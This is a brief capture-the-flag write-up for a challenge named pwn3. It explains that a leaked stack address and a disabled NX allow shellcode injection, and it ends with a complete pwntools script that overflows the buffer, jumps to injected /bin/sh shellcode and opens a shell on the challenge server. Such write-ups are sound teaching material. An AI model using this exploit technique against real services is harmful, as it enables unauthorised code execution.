pwn3 is the natural evolution of pwn2:
Welcome to the New Echo application 2.0!
Changelog:
- Less deprecated flag printing functions!
- New Random Number Generator!
Your random number 0xffc9967a!
Now what should I echo? springchicken_is_ok
springchicken_is_ok
Again, no canary and for the first time, NX disabled (this is nice).
BUT ASLR is enabled!
There is no print_flag function… man this is though.
Or maybe not? NX is disabled, so I can put a shellcraft into the stack and execute it.
But how can I reference it? Just look at the output of radare2.
The address printed at the beginning is the address of the input string.
BINGO.
from pwn import *
OFFSET = 242 #found using ragg2
rem = remote('pwn.ctf.tamu.edu', 4323)
#read useless line
for i in range(0,5):
rem.recvline()
#this is the address line
to_grep = rem.recvline()
#this is the address
address = '0x'+to_grep[::-1][2:10][::-1]
address = p32(int(address,16))
#voilĂ
shellcode = asm(shellcraft.i386.sh())
exploit = shellcode + 'A'*(OFFSET - len(shellcode)) + address
rem.sendline(exploit)
rem.interactive()
Flag captured <.<